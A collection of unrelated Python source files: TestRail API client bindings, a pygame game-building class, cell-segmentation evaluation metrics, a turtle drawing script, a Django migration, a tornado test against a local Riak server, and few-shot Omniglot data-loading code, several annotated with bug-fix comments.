        :param name: The name of the section (required)
        :key description: str - The description of the section
            (added with TestRail 4.0)
        :key suite_id: int - The ID of the test suite (ignored if the project
            is operating in single suite mode, required otherwise)
        :key parent_id: int - The ID of the parent section
            (to build section hierarchies)
        :return: response
        """
        data = dict(name=name, **kwargs)
        return self._session.request(
            METHODS.POST, f"add_section/{project_id}", json=data
        )

    def update_section(self, section_id: int, **kwargs) -> dict:
        """Update an existing section (partial updates are supported, i.e.
        you can submit and update specific fields only).

        http://docs.gurock.com/testrail-api2/reference-sections#update_section

        :param section_id: The ID of the section
        :key name: str - The name of the section
        :key description: str - The description of the section
            (added with TestRail 4.0)
        :return: response
        """
        return self._session.request(
            METHODS.POST, f"update_section/{section_id}", json=kwargs
        )

    def delete_section(self, section_id: int) -> None:
        """Delete an existing section.

        http://docs.gurock.com/testrail-api2/reference-sections#delete_section

        :param section_id: The ID of the section
        :return: response
        """
        return self._session.request(METHODS.POST, f"delete_section/{section_id}")
class Statuses(_MetaCategory):
    """API bindings for test statuses.

    http://docs.gurock.com/testrail-api2/reference-statuses
    """
    # FIX: the class docstring previously pointed at "reference-sections",
    # a copy-paste leftover from the Sections category.

    def get_statuses(self) -> List[dict]:
        """List the available test statuses.

        http://docs.gurock.com/testrail-api2/reference-statuses#get_statuses

        :return: response
        """
        return self._session.request(METHODS.GET, "get_statuses")
class Suites(_MetaCategory):
    """API bindings for test suites.

    http://docs.gurock.com/testrail-api2/reference-suites
    """

    def get_suite(self, suite_id: int) -> dict:
        """Fetch a single existing test suite.

        http://docs.gurock.com/testrail-api2/reference-suites#get_suite

        :param suite_id: The ID of the test suite
        :return: response
        """
        endpoint = f"get_suite/{suite_id}"
        return self._session.request(METHODS.GET, endpoint)

    def get_suites(self, project_id: int) -> List[dict]:
        """List the test suites of a project.

        http://docs.gurock.com/testrail-api2/reference-suites#get_suites

        :param project_id: The ID of the project
        :return: response
        """
        endpoint = f"get_suites/{project_id}"
        return self._session.request(METHODS.GET, endpoint)

    def add_suite(self, project_id: int, name: str, **kwargs) -> dict:
        """Create a new test suite.

        http://docs.gurock.com/testrail-api2/reference-suites#add_suite

        :param project_id: The ID of the project the test suite should be added to
        :param name: The name of the test suite (required)
        :key description: str - The description of the test suite
        :return: response
        """
        payload = {"name": name, **kwargs}
        endpoint = f"add_suite/{project_id}"
        return self._session.request(METHODS.POST, endpoint, json=payload)

    def update_suite(self, suite_id: int, **kwargs) -> dict:
        """Update an existing test suite (partial updates are supported, i.e.
        you can submit and update specific fields only).

        http://docs.gurock.com/testrail-api2/reference-suites#update_suite

        :param suite_id: The ID of the test suite
        :param kwargs: This methods supports the same POST fields as add_suite.
        :return: response
        """
        endpoint = f"update_suite/{suite_id}"
        return self._session.request(METHODS.POST, endpoint, json=kwargs)

    def delete_suite(self, suite_id: int) -> None:
        """Delete an existing test suite.

        http://docs.gurock.com/testrail-api2/reference-suites#delete_suite

        :param suite_id: The ID of the test suite
        :return: response
        """
        endpoint = f"delete_suite/{suite_id}"
        return self._session.request(METHODS.POST, endpoint)
class Template(_MetaCategory):
    """API bindings for templates.

    http://docs.gurock.com/testrail-api2/reference-templates
    """

    def get_templates(self, project_id: int) -> List[dict]:
        """List the available templates (requires TestRail 5.2 or later).

        http://docs.gurock.com/testrail-api2/reference-templates#get_templates

        :param project_id: The ID of the project
        :return: response
        """
        endpoint = f"get_templates/{project_id}"
        return self._session.request(METHODS.GET, endpoint)
class Tests(_MetaCategory):
    """API bindings for tests.

    http://docs.gurock.com/testrail-api2/reference-tests
    """

    def get_test(self, test_id: int) -> dict:
        """Fetch a single existing test.
        If you interested in the test results rather than the tests, please
        see get_results instead.

        http://docs.gurock.com/testrail-api2/reference-tests#get_test

        :param test_id: The ID of the test
        :return: response
        """
        endpoint = f"get_test/{test_id}"
        return self._session.request(METHODS.GET, endpoint)

    def get_tests(self, run_id: int, **kwargs) -> List[dict]:
        """List the tests of a test run.

        http://docs.gurock.com/testrail-api2/reference-tests#get_tests

        :param run_id: The ID of the test run
        :param kwargs: filters
        :key status_id: int(list) - A comma-separated list of status IDs
            to filter by.
        :return: response
        """
        endpoint = f"get_tests/{run_id}"
        return self._session.request(METHODS.GET, endpoint, params=kwargs)
class Users(_MetaCategory):
    """API bindings for users.

    http://docs.gurock.com/testrail-api2/reference-users
    """

    def get_user(self, user_id: int) -> dict:
        """Fetch a single existing user.

        http://docs.gurock.com/testrail-api2/reference-users#get_user

        :param user_id: The ID of the user
        :return: response
        """
        return self._session.request(METHODS.GET, f"get_user/{user_id}")

    def get_user_by_email(self, email: str) -> dict:
        """Fetch an existing user by his/her email address.

        http://docs.gurock.com/testrail-api2/reference-users#get_user_by_email

        :param email: The email address to get the user for
        :return: response
        """
        # FIX: the endpoint was written as an f-string with no placeholders
        # (f"get_user_by_email"); a plain string literal is correct here.
        return self._session.request(
            METHODS.GET, "get_user_by_email", params={"email": email}
        )

    def get_users(self) -> List[dict]:
        """List the users.

        http://docs.gurock.com/testrail-api2/reference-users#get_users

        :return: response
        """
        return self._session.request(METHODS.GET, "get_users")
class Attachments(_MetaCategory):
    """API bindings for attachments.

    http://docs.gurock.com/testrail-api2/reference-attachments
    """

    def add_attachment_to_result(self, result_id: int, path: Union[str, Path]) -> dict:
        """Attach a file to a result, identified by result ID.
        The maximum allowable upload size is set to 256mb.

        http://docs.gurock.com/testrail-api2/reference-attachments#add_attachment_to_result

        :param result_id: The ID of the result the attachment should be added to
        :param path: The path to the file
        :return: response
        """
        endpoint = f"add_attachment_to_result/{result_id}"
        return self._session.attachment_request(METHODS.POST, endpoint, path)

    def get_attachments_for_case(self, case_id: int) -> List[dict]:
        """List the attachments of a test case.

        http://docs.gurock.com/testrail-api2/reference-attachments#get_attachments_for_case

        :param case_id: The ID of the test case
        :return: response
        """
        endpoint = f"get_attachments_for_case/{case_id}"
        return self._session.request(METHODS.GET, endpoint)

    def get_attachments_for_test(self, test_id: int) -> List[dict]:
        """List the attachments of test results.

        http://docs.gurock.com/testrail-api2/reference-attachments#get_attachments_for_test

        :param test_id: The ID of the test
        :return: response
        """
        endpoint = f"get_attachments_for_test/{test_id}"
        return self._session.request(METHODS.GET, endpoint)

    def get_attachment(self, attachment_id: int, path: Union[str, Path]) -> Path:
        """Download the attachment identified by attachment_id to *path*.

        http://docs.gurock.com/testrail-api2/reference-attachments#get_attachment

        :param attachment_id: The ID of the attachment
        :param path: Path to write the attachment to
        :return: Path
        """
        endpoint = f"get_attachment/{attachment_id}"
        return self._session.get_attachment(METHODS.GET, endpoint, path)

    def delete_attachment(self, attachment_id: int) -> None:
        """Delete the attachment identified by attachment_id.

        http://docs.gurock.com/testrail-api2/reference-attachments#delete_attachment

        :param attachment_id: The ID of the attachment
        :return: None
        """
        endpoint = f"delete_attachment/{attachment_id}"
        return self._session.request(METHODS.POST, endpoint)
class Reports(_MetaCategory):
    """API bindings for reports.

    http://docs.gurock.com/testrail-api2/reference-reports
    """

    def get_reports(self, project_id: int) -> List[dict]:
        """List the API-available reports of a project.

        http://docs.gurock.com/testrail-api2/reference-reports#get_reports

        :param project_id: The ID of the project for which you want a list of
            API accessible reports
        :return: response
        """
        endpoint = f"get_reports/{project_id}"
        return self._session.request(METHODS.GET, endpoint)

    def run_report(self, report_template_id: int) -> dict:
        """Execute the report identified using the :report_id parameter and
        return URL's for accessing the report in HTML and PDF format.

        http://docs.gurock.com/testrail-api2/reference-reports#run_report

        :param report_template_id: The ID of the report template
        :return: response
        """
        endpoint = f"run_report/{report_template_id}"
        return self._session.request(METHODS.GET, endpoint)
|
import pygame
from Board.Buildings.Building import Building
class Base(Building):
    """Base building; one texture per player colour, in player-index order."""

    # Texture files indexed by player colour (green, blue, yellow, red).
    _TEXTURE_PATHS = (
        'images/buildings/baseGreen.png',
        'images/buildings/baseBlue.png',
        'images/buildings/baseYellow.png',
        'images/buildings/baseRed.png',
    )

    def __init__(self, player, tile):
        # Load every colour variant once and scale it to the tile size.
        self.Textures = [
            pygame.transform.scale(pygame.image.load(p).convert_alpha(), [45, 45])
            for p in self._TEXTURE_PATHS
        ]
        super().__init__(player, tile, self.Textures)
|
print("Primul curs")
import numpy as np
import pickle
from experiments.dev import sampling
from scipy.optimize import linear_sum_assignment
import torch
import matplotlib.pyplot as plt
from tqdm import tqdm, trange
def predict_segmentations(dataset, model, device, iou_threshold, min_objprob, num_proposals):
    """Predict the segmentation for all images in the dataset.

    Parameters:
    dataset -- dataset.Dataset instance
    model -- multitaskmodel.Multitaskmodel instance
    device -- cuda device
    iou_threshold -- intersection over union threshold
    min_objprob -- minimum required object probability to sample
    num_proposals -- number of proposals to generate

    Returns: tuple (pred_segmentation_stack, labels_stack):
    pred_segmentation_stack -- list of arrays of shapes (num_pred_cells, height, width)
        with predicted segmentations
    labels_stack -- list with the corresponding ground-truth label arrays
    (Fixed docstring: the function has always returned both lists, not just the first.)
    """
    model = model.to(device)
    pred_segmentation_stack = []
    labels_stack = []
    num_images = dataset.images.shape[0]
    for i in tqdm(range(num_images)):
        # get and normalize image with the dataset-wide min/max, convert to tensor
        img = dataset.images[i]
        img = (img - dataset.min_max_value[0]) / (dataset.min_max_value[1] - dataset.min_max_value[0])
        img = torch.from_numpy(img).to(device)
        # predict features; no_grad avoids building the autograd graph during
        # inference (previously the graph was built and only discarded via detach)
        with torch.no_grad():
            pred_overlap, pred_stardist, pred_objprob = model(img.unsqueeze(0))
        pred_overlap = torch.sigmoid(pred_overlap).cpu().numpy()
        pred_objprob = torch.sigmoid(pred_objprob).cpu().numpy()
        pred_stardist = pred_stardist.cpu().numpy()
        # find segmentation with non-maximum suppression
        pred_segmentation, _ = sampling.nms(pred_overlap[0, 0], pred_stardist[0], pred_objprob[0, 0], num_proposals, iou_threshold, min_objprob)
        pred_segmentation_stack.append(pred_segmentation)
        labels_stack.append(dataset.labels[i])
    return pred_segmentation_stack, labels_stack
def optimal_assignment_dice(pred_segmentation, labels):
    """Find the optimal assignment of predictions and labels wrt dice coefficient with the Hungarian algorithm.

    Parameters:
        pred_segmentation -- array of shape (num_pred_cells, H, W) with predicted segmentation masks
        labels -- array of shape (num_gt_cells, H, W) with gt segmentation masks
    Returns: array with detected gt cell indices, array with matched predicted cell indices,
    array with corresponding dice coefficients
    """
    assert pred_segmentation.shape[1:] == labels.shape[1:]
    num_cells_pred = pred_segmentation.shape[0]
    num_cells_gt = labels.shape[0]
    # table for the dice coefficients of all predicted - gt combinations
    coefficients = np.zeros((num_cells_gt, num_cells_pred))
    # iterate over ground truth objects
    for i in range(num_cells_gt):
        # make as many copies of ground truth label i as there are predicted cells
        gt_cell = np.repeat(labels[i][np.newaxis, :, :], num_cells_pred, axis=0)
        # dice coefficient between every predicted cell and ground truth cell i
        dc = (
            2 * np.count_nonzero(np.logical_and(gt_cell, pred_segmentation), axis=(1, 2)) /
            (np.count_nonzero(gt_cell, axis=(1, 2)) + np.count_nonzero(pred_segmentation, axis=(1, 2)))
        )
        coefficients[i, :] = dc
    # BUG FIX: the assignment must MAXIMIZE the summed dice coefficient.
    # The old call used maximize=False, i.e. it picked the WORST possible
    # matching; the sibling optimal_assignment_iou correctly uses maximize=True.
    gt_order, pred_order = linear_sum_assignment(coefficients, maximize=True)
    # pick the dice coefficients of the optimal assignment
    dice = coefficients[gt_order, pred_order]
    return gt_order, pred_order, dice
def optimal_assignment_iou(pred_segmentation, labels):
    """Optimal (Hungarian) matching of predictions to labels by IoU.

    Parameters:
        pred_segmentation -- array of shape (num_pred_cells, H, W) with predicted segmentation masks
        labels -- array of shape (num_gt_cells, H, W) with gt segmentation masks
    Returns: array with detected gt cell indices, array with matched predicted cell indices,
    array with corresponding IoU scores
    """
    assert pred_segmentation.shape[1:] == labels.shape[1:]
    num_pred = pred_segmentation.shape[0]
    num_gt = labels.shape[0]
    # IoU of every (gt, predicted) pair
    scores = np.zeros((num_gt, num_pred))
    for gt_idx in range(num_gt):
        # broadcast the single gt mask against every predicted mask at once
        gt_mask = labels[gt_idx][np.newaxis, :, :]
        intersection = np.count_nonzero(np.logical_and(gt_mask, pred_segmentation), axis=(1, 2))
        union = np.count_nonzero(gt_mask + pred_segmentation, axis=(1, 2))
        scores[gt_idx, :] = intersection / union
    # assignment maximizing the summed IoU
    gt_order, pred_order = linear_sum_assignment(scores, maximize=True)
    return gt_order, pred_order, scores[gt_order, pred_order]
def hungry_assignment_dice(pred_segmentation, labels):
    """Greedy ("hungry") matching of predicted objects to gt objects by dice.

    Ground-truth objects are processed in order; each one claims its best
    still-unmatched prediction, even if that prediction would fit a later
    gt object better.

    Parameters:
        pred_segmentation -- array of shape (num_pred_cells, H, W) with predicted segmentation masks
        labels -- array of shape (num_gt_cells, H, W) with gt segmentation masks
    Returns: array of matched gt indices, array of matched prediction indices,
    array of the corresponding dice coefficients
    """
    assert pred_segmentation.shape[1:] == labels.shape[1:]
    matched_gt, matched_pred, matched_dice = [], [], []
    taken = set()  # prediction indices already claimed by an earlier gt object
    for gt_idx in range(labels.shape[0]):
        gt_mask = labels[gt_idx]
        gt_area = np.count_nonzero(gt_mask)
        best_dc, best_pred = 0, -1
        for pred_idx in range(pred_segmentation.shape[0]):
            if pred_idx in taken:
                continue
            pred_mask = pred_segmentation[pred_idx]
            overlap = np.count_nonzero(np.logical_and(gt_mask, pred_mask))
            dc = 2 * overlap / (gt_area + np.count_nonzero(pred_mask))
            if dc > best_dc:
                best_dc, best_pred = dc, pred_idx
        # only record a match if some prediction actually overlaps this gt object
        if best_dc != 0:
            matched_gt.append(gt_idx)
            matched_pred.append(best_pred)
            matched_dice.append(best_dc)
            taken.add(best_pred)
    return np.array(matched_gt), np.array(matched_pred), np.array(matched_dice)
def hungry_assignment_iou(pred_segmentation, labels):
    """Greedy ("hungry") matching of predicted objects to gt objects by IoU.

    Ground-truth objects are processed in order; each one claims its best
    still-unmatched prediction, even if that prediction would fit a later
    gt object better.

    Parameters:
        pred_segmentation -- array of shape (num_pred_cells, H, W) with predicted segmentation masks
        labels -- array of shape (num_gt_cells, H, W) with gt segmentation masks
    Returns: array of matched gt indices, array of matched prediction indices,
    array of the corresponding IoU scores
    """
    assert pred_segmentation.shape[1:] == labels.shape[1:]
    matched_gt, matched_pred, matched_iou = [], [], []
    taken = set()  # prediction indices already claimed by an earlier gt object
    for gt_idx in range(labels.shape[0]):
        gt_mask = labels[gt_idx]
        best_iou, best_pred = 0, -1
        for pred_idx in range(pred_segmentation.shape[0]):
            if pred_idx in taken:
                continue
            pred_mask = pred_segmentation[pred_idx]
            intersection = np.count_nonzero(np.logical_and(gt_mask, pred_mask))
            union = np.count_nonzero(np.logical_or(gt_mask, pred_mask))
            iou = intersection / union
            if iou > best_iou:
                best_iou, best_pred = iou, pred_idx
        # only record a match if some prediction actually overlaps this gt object
        if best_iou != 0:
            matched_gt.append(gt_idx)
            matched_pred.append(best_pred)
            matched_iou.append(best_iou)
            taken.add(best_pred)
    return np.array(matched_gt), np.array(matched_pred), np.array(matched_iou)
def prediction_grid(dataset, model, device, nms_thresholds, min_objprobs, num_proposals):
    """Generate predictions on the complete dataset for different parameters.

    Parameters:
        dataset -- dataset.Dataset instance
        model -- multitaskmodel.MultitaskModel instance
        device -- cuda device
        nms_thresholds -- list with IoU thresholds for non-maximum suppression
        min_objprobs -- list with minimum object probabilities for sampling proposals
        num_proposals -- number of proposals to generate per image
    Returns: 2d list with complete dataset segmentations for the grid of
    nms_thresholds x min_objprobs values, and the labels (None if either
    parameter list is empty).
    """
    predictions = []
    # BUG FIX: labels was previously unbound (NameError at return) when the
    # parameter grid was empty; it is the same for every call, so keeping the
    # value of the last call is fine.
    labels = None
    for nms_threshold in tqdm(nms_thresholds):
        row = []
        for min_objprob in tqdm(min_objprobs):
            prediction, labels = predict_segmentations(dataset, model, device, nms_threshold, min_objprob, num_proposals)
            row.append(prediction)
        predictions.append(row)
    return predictions, labels
def save_prediction(file, predictions, labels, nms_thresholds, min_objprobs, num_proposals):
    """Save prediction and parameters with pickle.

    BUG FIX: the file handle is now closed deterministically via a context
    manager; the old code leaked the handle returned by open().
    """
    data = {"predictions": predictions, "labels": labels, "nms_thresholds": nms_thresholds, "min_objprobs": min_objprobs, "num_proposals": num_proposals}
    with open(file, 'wb') as fh:
        pickle.dump(data, fh)
def get_precisions(pred_segmentation_stack, labels_stack, matching_thresholds):
    """Compute the average precision of detections over a set of images, defined as tp / (tp + fp + fn).

    tp: number of matches (gt object with predicted object such that IoU > threshold)
    fp: number of unmatched predicted objects
    fn: number of unmatched gt objects

    Parameters:
        pred_segmentation_stack -- list of arrays, each of shape (num_pred_cells, height, width)
        labels_stack -- list of arrays, each of shape (num_gt_cells, height, width)
        matching_thresholds -- list of IoU thresholds above which two objects count as a match
    Returns: per-threshold average precision over the images, and its standard deviation
    """
    assert len(pred_segmentation_stack) == len(labels_stack)
    num_images = len(labels_stack)
    num_thresholds = len(matching_thresholds)
    precisions = np.zeros((num_images, num_thresholds))
    for i in range(num_images):
        # optimal matching already returns numpy arrays; only the IoU scores are needed
        _, _, iou_scores = optimal_assignment_iou(pred_segmentation_stack[i], labels_stack[i])
        num_pred = len(pred_segmentation_stack[i])
        num_gt = len(labels_stack[i])
        for j, threshold in enumerate(matching_thresholds):
            # compute the match count once per threshold (was computed three times)
            tp = (iou_scores > threshold).sum()
            fp = num_pred - tp
            fn = num_gt - tp
            precisions[i, j] = tp / (tp + fp + fn)
    return precisions.mean(axis=0), precisions.std(axis=0)
def get_isbi_metrics(pred_segmentation_stack, labels_stack):
    """Compute the metrics from the ISBI challenge:
    - average dice coefficient of all matchings passing the 0.7 cut-off
    - object-based false negative rate (missed gt cells and weak matchings)
    - average pixel-based true positive rate of the qualified matchings
    - average pixel-based false positive rate of the qualified matchings

    NOTE(review): the cut-off below is applied to the DICE coefficient
    (dc < 0.7), although the surrounding docstrings describe it as an IoU
    threshold -- confirm which one the challenge specifies.

    Parameters:
        pred_segmentation_stack -- list of arrays, with each array having shape (num_pred_cells, height, width)
        labels_stack -- list of arrays, with each array having shape (num_gt_cells, height, width)
    Returns: dc, dc_std, fnr, fnr_std, tpr, tpr_std, fpr, fpr_std (rounded to 5 decimals)
    """
    assert len(pred_segmentation_stack) == len(labels_stack)
    num_images = len(labels_stack)
    qualified_dc_list = []   # dice values of matchings with dc >= 0.7
    qualified_tpr_list = []  # per-matching pixel true positive rates
    qualified_fpr_list = []  # per-matching pixel false positive rates
    num_gt_objects = 0       # total number of gt objects over all images
    fnr_images = []          # per-image false negative rates (for the std)
    for i in range(num_images):
        # greedy (first-come) matching of predictions to gt objects by IoU
        gt_order, pred_order, _ = hungry_assignment_iou(pred_segmentation_stack[i], labels_stack[i])
        num_matchings = gt_order.shape[0]
        num_gt_objects += labels_stack[i].shape[0]
        num_gt_objects_i = labels_stack[i].shape[0]
        num_qualified_i = 0
        for j in range(num_matchings):
            prediction = pred_segmentation_stack[i][pred_order][j].astype('bool')
            gt = labels_stack[i][gt_order][j].astype('bool')
            # dice coefficient of this matched pair
            dc = 2 * np.count_nonzero(np.logical_and(prediction, gt)) / (np.count_nonzero(prediction) + np.count_nonzero(gt))
            if dc < 0.7:
                # weak matchings count as false negatives, not as detections
                continue
            diff = np.logical_xor(prediction, gt)
            # pixel-based metrics of the qualified matching
            tp = np.logical_and(prediction, gt).sum()
            tn = np.logical_and(np.invert(gt), np.invert(prediction)).sum()
            fp = np.logical_and(diff, prediction).sum()
            fn = np.logical_and(diff, gt).sum()
            qualified_dc_list.append(dc)
            qualified_tpr_list.append(tp / (tp + fn))
            qualified_fpr_list.append(fp / (fp + tn))
            num_qualified_i += 1
        fnr_images.append((num_gt_objects_i - num_qualified_i) / num_gt_objects_i)
    # aggregate over all qualified matchings of all images
    dc_average = np.array(qualified_dc_list).mean()
    dc_std = np.array(qualified_dc_list).std()
    # object-based FNR over the whole dataset; its std is taken over images
    fnr = (num_gt_objects - len(qualified_dc_list)) / num_gt_objects
    fnr_std = np.array(fnr_images).std()
    tpr_average = np.array(qualified_tpr_list).mean()
    tpr_std = np.array(qualified_tpr_list).std()
    fpr_average = np.array(qualified_fpr_list).mean()
    fpr_std = np.array(qualified_fpr_list).std()
    return round(dc_average, 5), round(dc_std, 5), round(fnr, 5), round(fnr_std, 5), round(tpr_average, 5), round(tpr_std, 5), round(fpr_average, 5), round(fpr_std, 5)
def scores_prediction_grid(predictions, labels):
    """Compute the ISBI15 metrics for every cell of a parameter grid, as returned by prediction_grid().

    Parameters:
        predictions -- 2d list of predictions on the complete dataset
        labels -- list with arrays of labels for every image
    Returns: arrays dc, dc_std, fnr, fnr_std, tpr, tpr_std, fpr, fpr_std,
    each of shape (num_nms_thresholds, num_min_objprobs)
    """
    grid_shape = (len(predictions), len(predictions[0]))
    dc, dc_std = np.empty(grid_shape), np.empty(grid_shape)
    fnr, fnr_std = np.empty(grid_shape), np.empty(grid_shape)
    tpr, tpr_std = np.empty(grid_shape), np.empty(grid_shape)
    fpr, fpr_std = np.empty(grid_shape), np.empty(grid_shape)
    for i in trange(grid_shape[0]):
        for j in trange(grid_shape[1]):
            metrics = get_isbi_metrics(predictions[i][j], labels)
            (dc[i, j], dc_std[i, j], fnr[i, j], fnr_std[i, j],
             tpr[i, j], tpr_std[i, j], fpr[i, j], fpr_std[i, j]) = metrics
    return dc, dc_std, fnr, fnr_std, tpr, tpr_std, fpr, fpr_std
def precision_prediction_grid(predictions, labels, matching_thresholds):
    """Compute the average precision for every cell of a parameter grid, as returned by prediction_grid().

    Parameters:
        predictions -- 2d list of predictions on the complete dataset
        labels -- list with arrays of labels for every image
        matching_thresholds -- IoU thresholds at which precision is evaluated
    Returns: array with average precisions and array with std's, both of shape
    (num_nms_thresholds, num_min_objprobs, num_matching_thresholds)
    """
    grid_shape = (len(predictions), len(predictions[0]), len(matching_thresholds))
    precisions = np.zeros(grid_shape)
    precisions_std = np.zeros(grid_shape)
    for i in trange(grid_shape[0]):
        for j in trange(grid_shape[1]):
            mean, std = get_precisions(predictions[i][j], labels, matching_thresholds)
            precisions[i, j, :] = mean
            precisions_std[i, j, :] = std
    return precisions, precisions_std
def save_isbi_metrics(file, dc, dc_std, fnr, fnr_std, tpr, tpr_std, fpr, fpr_std, nms_thresholds, min_objprobs, num_proposals):
    """Save isbi metrics and parameters with pickle.

    BUG FIX: the file handle is now closed deterministically via a context
    manager; the old code leaked the handle returned by open().
    """
    data = {"dc": dc, "dc_std": dc_std, "fnr": fnr, "fnr_std": fnr_std, "tpr": tpr, "tpr_std": tpr_std, "fpr": fpr, "fpr_std": fpr_std, "nms_thresholds": nms_thresholds, "min_objprobs": min_objprobs, "num_proposals": num_proposals}
    with open(file, 'wb') as fh:
        pickle.dump(data, fh)
def save_precisions(file, precisions, precisions_std, nms_thresholds, min_objprobs, num_proposals, matching_thresholds):
    """Save precisions and parameters with pickle.

    BUG FIX: the file handle is now closed deterministically via a context
    manager; the old code leaked the handle returned by open().
    """
    data = {"precision": precisions, "precision_std": precisions_std, "nms_thresholds": nms_thresholds, "min_objprobs": min_objprobs, "num_proposals": num_proposals, "matching_thresholds": matching_thresholds}
    with open(file, 'wb') as fh:
        pickle.dump(data, fh)
|
import turtle
import math
import random
# Draw 30 overlapping circles in random colors on a black background,
# rotating 45 degrees between circles.
bob = turtle.Turtle()
bob.speed(15)
turtle.getscreen().bgcolor("black")
turtle.hideturtle()
colors = ["yellow", "red", "green", "blue", "orange", "violet", "indigo"]
for i in range(30):
    bob.hideturtle()
    # FIX: both branches of the old if/else were identical except for the
    # circle radius sign -- alternate orientation with a single expression
    # (positive radius = counter-clockwise, negative = clockwise).
    bob.circle(100 if i % 2 == 0 else -100)
    bob.color(random.choice(colors))
    bob.left(45)
turtle.done()
|
# Generated by Django 3.0 on 2020-03-20 09:15
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    """Auto-generated migration altering the created_date defaults of comment and post.

    NOTE(review): the default is the FIXED timestamp captured when
    `makemigrations` ran (2020-03-20 09:15 UTC), not "now". This is typical
    of auto-generated migrations; rows created through this default would all
    share the same datetime -- confirm the model uses e.g. timezone.now.
    """
    dependencies = [
        ('blog', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='comment',
            name='created_date',
            field=models.DateTimeField(default=datetime.datetime(2020, 3, 20, 9, 15, 54, 879816, tzinfo=utc)),
        ),
        migrations.AlterField(
            model_name='post',
            name='created_date',
            field=models.DateTimeField(default=datetime.datetime(2020, 3, 20, 9, 15, 54, 879816, tzinfo=utc)),
        ),
    ]
|
from tornado import gen, testing
from tornado.testing import gen_test
import tornado
import tornado.ioloop
import tornado.httpclient
import ujson as json
class MyTestCase(testing.AsyncTestCase):
    """Integration test against a local Riak/Solr HTTP API.

    setUp PUTs a test document, tearDown DELETEs it again, and the test
    queries the search index for it.
    """
    client = testing.AsyncHTTPClient()
    name = 'mercedes15'
    url = "http://localhost:8098/types/cars/buckets/sport/keys/{}".format(name)

    def setUp(self):
        print("Setting up")
        super().setUp()
        tornado.ioloop.IOLoop.current().run_sync(self.put)

    def tearDown(self):
        # BUG FIX: the old tearDown contained a bare `yield`, which turned it
        # into a generator function -- its body (including the DELETE cleanup)
        # was NEVER executed. Run the cleanup coroutine synchronously instead,
        # mirroring setUp. The manual IOLoop.stop() is dropped: AsyncTestCase
        # manages its own loop lifecycle.
        print("Tearing down")
        tornado.ioloop.IOLoop.current().run_sync(self.delete)
        super().tearDown()

    @gen.coroutine
    def delete(self):
        """Remove the test document created in setUp."""
        request = tornado.httpclient.HTTPRequest(self.url, method='DELETE')
        response = yield self.client.fetch(request)
        print("Response just after sending DELETE {}".format(response))

    @gen.coroutine
    def put(self):
        """Store the test document."""
        print("Putting")
        # BUG FIX: the old code hand-built a JSON string (with an unquoted
        # string value) and then json.dumps'ed it AGAIN, sending a
        # double-encoded body. Build a dict and serialize it once.
        data = {"name_s": self.name, "model_i": 2018, "leader_b": True}
        headers = {'Content-Type': 'application/json'}
        request = tornado.httpclient.HTTPRequest(self.url, method='PUT', headers=headers, body=json.dumps(data))
        response = yield self.client.fetch(request)
        print("Response just after sending PUT {}".format(response))
        return response

    @gen_test
    def test_find_one(self):
        print("Finding")
        response = yield self.client.fetch(
            "http://localhost:8098/search/query/famous?wt=json&q=name_s:{}".format(self.name))
        print(response)
        self.assertIn("name_s:{}".format(self.name), str(response.body))
import torch
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
from torch.autograd import Variable
import numpy as np
import os
from PIL import Image
import torchvision.datasets as dset
import torch.nn.functional as F
from torch.utils.data import DataLoader,Dataset
import random
import matplotlib.pyplot as plt
from torch.utils.data.sampler import Sampler
class Rotate(object):
    """Callable transform that rotates a PIL image by a fixed angle."""

    def __init__(self, angle):
        # rotation angle in degrees, passed straight to Image.rotate
        self.angle = angle

    def __call__(self, x, mode="reflect"):
        # `mode` is accepted for API compatibility but not used by rotate
        return x.rotate(self.angle)
def data_folders(data_folder='dir/to/dataset'):
    """Split the class folders of an Omniglot-style dataset into meta-train and meta-val.

    Parameters:
        data_folder -- root directory whose immediate sub-directories are the classes
    Returns: (metatrain_character_folders, metaval_character_folders); the first
    36 shuffled folders go to meta-train, the rest to meta-val.
    """
    # FIX: removed the unused `dataset_name` local that was derived from the path
    character_folders = [os.path.join(data_folder, family)
                         for family in os.listdir(data_folder)
                         if os.path.isdir(os.path.join(data_folder, family))]
    # fixed seed so the train/val split is reproducible across runs
    random.seed(1)
    random.shuffle(character_folders)
    num_train = 36
    metatrain_character_folders = character_folders[:num_train]
    metaval_character_folders = character_folders[num_train:]
    return metatrain_character_folders, metaval_character_folders
def get_data_loader(task, dataset_name, num_per_class=1, split='train', shuffle=True, rotation=0):
    """Build a DataLoader over one few-shot task.

    Images are rotated by `rotation` degrees, converted to tensors and
    normalized; sampling is class-balanced so every batch contains
    `num_per_class` examples of each of the task's classes.
    """
    normalize = transforms.Normalize(mean=[0.92206, 0.92206, 0.92206], std=[0.08426, 0.08426, 0.08426])
    transform = transforms.Compose([Rotate(rotation), transforms.ToTensor(), normalize])
    dataset = Omniglot(task, split=split, transform=transform)
    # the sampler needs to know how many instances per class the split holds
    num_inst = task.train_num if split == 'train' else task.test_num
    sampler = ClassBalancedSampler(num_per_class, task.num_classes, num_inst, shuffle=shuffle)
    return DataLoader(dataset, batch_size=num_per_class * task.num_classes, sampler=sampler)
class create_task(object):
    """Sample one N-way few-shot classification task.

    Picks `num_classes` random class folders, shuffles each folder's files and
    splits them into `train_num` support and `test_num` query file paths with
    matching integer labels (0..num_classes-1).
    """

    def __init__(self, character_folders, num_classes, train_num, test_num):
        self.character_folders = character_folders
        self.num_classes = num_classes
        self.train_num = train_num
        self.test_num = test_num
        class_folders = random.sample(self.character_folders, self.num_classes)
        labels = np.array(range(len(class_folders)))
        labels = dict(zip(class_folders, labels))
        samples = dict()
        self.train_roots = []
        self.test_roots = []
        for c in class_folders:
            temp = [os.path.join(c, x) for x in os.listdir(c)]
            # random.sample over the full length produces a shuffled copy
            samples[c] = random.sample(temp, len(temp))
            self.train_roots += samples[c][:train_num]
            self.test_roots += samples[c][train_num:train_num + test_num]
        self.train_labels = [labels[self.get_class(x)] for x in self.train_roots]
        self.test_labels = [labels[self.get_class(x)] for x in self.test_roots]

    def get_class(self, sample):
        # BUG FIX: the old os.path.join(*sample.split('/')[:-1]) dropped the
        # leading separator of absolute paths (causing KeyError in the label
        # lookup above) and broke on Windows separators; os.path.dirname is
        # the correct, equivalent operation for the relative-path case too.
        return os.path.dirname(sample)
class FewShotDataset(Dataset):
    """Abstract dataset over one few-shot task; subclasses implement __getitem__."""

    def __init__(self, task, split='train', transform=None, target_transform=None):
        self.transform = transform                # applied to the input image
        self.target_transform = target_transform  # applied to the label
        self.task = task
        self.split = split
